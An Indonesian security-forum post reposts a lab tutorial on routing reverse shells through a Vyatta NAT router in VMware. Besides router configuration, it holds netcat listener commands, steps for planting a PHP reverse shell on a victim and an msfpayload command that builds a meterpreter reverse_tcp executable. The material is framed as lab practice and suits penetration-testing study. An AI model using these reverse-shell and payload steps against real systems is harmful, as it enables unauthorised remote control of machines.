[ASK] metasploit beda jaringan
#1
mau tanya bro,,
baru jalan2 ke tetangga sesama os pentest
ketemu ini

"use Vyatta in vmware to simulate Hacking from inside network scenario"
ss nya ini
[Image: Diagram1.png]

info tetangga make blackbuntu bro,,
ok lansung saja,

m Image:
R1 - Vyatta have 2 nic , eth0 simulate as Wan , eth1 are Lan
Victim - Linux(u can use other operating system to create vuln image)
Attacker - Blackbuntu Linux

Vmware Configuration:
1. Create Vmware Team and add Lan segment in team, for Attacker-Network
please read http://www.vmware.com/support/ws5/doc/ws...izard.html for more information how to create team in vmware
2. Add Vyatta image to team, set eth0 connect to NAT, eth1 connect to Lan segment in team
3. Add Blackbuntu to to team, set network interface (in my case are eth0) connect to eth1
3. Vuln Image (Victim) set network connect to NAT

Vyatta Configuration:
set hostname and ip address, etc..

set system host-name R2
set system domain-name blackbuntu.lan
set interfaces ethernet eth0 address 172.16.14.11/24
set system name-server 172.16.14.2
set system gateway-address 172.16.14.2
set interfaces ethernet eth1 address 192.168.1.1/24
set service ssh


Configuring DHCP Server:

set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 start 192.168.1.20 stop 192.168.1.200
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 default-router 192.168.1.1
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 dns-server 172.16.14.2


## Configuring NAT

set service nat rule 1 source address 192.168.1.0/24
set service nat rule 1 outbound-interface eth0
set service nat rule 1 type masquerade


## Configuring Firewall:
## Define a firewall rule set:

set firewall name ALLOW_ESTABLISHED
set firewall name ALLOW_ESTABLISHED rule 10
set firewall name ALLOW_ESTABLISHED rule 10 action accept
set firewall name ALLOW_ESTABLISHED rule 10 state


## Apply the rule set to an interface:

set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
set interfaces ethernet eth0 firewall local name ALLOW_ESTABLISHED
commit
save

After commit and save, at this point you should ping and can connect from Blackbuntu(Attacker) to Victim (and internet too)

### Config port forward ###
Scenario/Question:
When we hack into victim, if we want to reverse shell back to Blackbuntu box that locate at inside network behind NAT,What can we do?

Solution/Answer:
Configure DNAT rules with port destination and firewall destination rules.
Example: on Blackbuntu box we listening on port 80 for incoming connection with command
$nc -lvvp 80
on vyatta should config DNAT like this:

NAT RULES:

set service nat rule 10 type destination
set service nat rule 10 protocol tcp
set service nat rule 10 inside-address port 80
set service nat rule 10 inside-address address 192.168.1.52
set service nat rule 10 inbound-interface eth0
set service nat rule 10 destination port 80
commit


FIREWALL RULES:

set firewall name ALLOW_ESTABLISHED rule 20 action accept
set firewall name ALLOW_ESTABLISHED rule 20 protocol tcp
set firewall name ALLOW_ESTABLISHED rule 20 destination address 192.168.1.52
set firewall name ALLOW_ESTABLISHED rule 20 destination port 80
set firewall name ALLOW_ESTABLISHED rule 20 state new enable
set firewall name ALLOW_ESTABLISHED rule 20 state established enable
set firewall name ALLOW_ESTABLISHED rule 20 state related enable
set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
commit
save

Forward port 4321
NAT RULES:

set service nat rule 20 type destination
set service nat rule 20 protocol tcp
set service nat rule 20 inside-address port 4321
set service nat rule 20 inside-address address 192.168.1.52
set service nat rule 20 inbound-interface eth0
set service nat rule 20 destination port 4321
commit

FIREWALL RULES:

set firewall name ALLOW_ESTABLISHED rule 30 action accept
set firewall name ALLOW_ESTABLISHED rule 30 protocol tcp
set firewall name ALLOW_ESTABLISHED rule 30 destination address 192.168.1.52
set firewall name ALLOW_ESTABLISHED rule 30 destination port 4321
set firewall name ALLOW_ESTABLISHED rule 30 state new enable
set firewall name ALLOW_ESTABLISHED rule 30 state established enable
set firewall name ALLOW_ESTABLISHED rule 30 state related enable
set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
commit
save

Example i edit php-reverse-shell.php and change line:

$ip = '172.16.14.11'; // CHANGE THIS
$port = 4321; // CHANGE THIS


upload to victim, then on Blackbuntu box i browse to htptp://172.16.14.129/php-reverse-shell.php
and run netcat with command
nc -lvvp 4321

[Image: w00t.png]

PHP Code:
If we use msfpayload to create evil file we use command:
msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.14.11 LPORT=4321 x >/home/c1ph3r/payload.exe

Please note
LHOST are IP Address of WAN Interface(eth0

nah itu katanya kalo pake metasploit..
ane sedang dalam percobaan bro
bagi abang" kakak" adek" pokonya yang di forum nih lah
yang berniat coba hasilnya posting dimari lagi yah biar jadi pembelajaran juga
Smile Big Grin[/quote]




kelupaann
source nya http://www.blackbuntu.com/node/41





Users browsing this thread: 1 Guest(s)